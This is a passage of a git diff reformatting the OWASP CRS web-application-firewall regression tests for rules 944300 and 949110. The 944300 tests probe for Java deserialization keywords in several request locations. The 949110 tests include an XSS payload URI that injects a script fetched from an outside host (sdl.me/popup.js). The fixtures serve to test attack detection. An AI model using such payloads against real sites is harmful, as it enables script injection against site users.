"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 309 desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 310 desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 311 desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 312 desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HdoaWxlY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 313 desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 314 desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 315 desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 316 desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 317 desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 318 desc: "Content-Type application/json arg value includes keyword 
HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 319 desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 320 desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 321 desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_id: 322 desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 323 desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: B3aGlsZWNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-324 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 324 desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 325 desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 326 desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 327 desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 328 desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 329 desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_id: 330 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" 
diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml
index 33c049be4..96009a36e 100644
--- a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml
+++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml
@@ -1,92 +1,86 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "949110.yaml" description: | Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 949110 tests: - - test_title: 949110-1 + - test_id: 1 desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "949110" - - test_title: 949110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "949110" + - test_id: 2 desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET 
- port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: http://www.coreruleset.org - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "949110" - - test_title: 949110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.coreruleset.org + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: id "949110" + - test_id: 3 desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"949110\"" - - test_title: 949110-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + no_log_contains: "id \"949110\"" + - test_id: 4 desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"949110\"" - - test_title: 949110-5 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"949110\"" + - test_id: 5 desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "Inbound Anomaly Score Exceeded 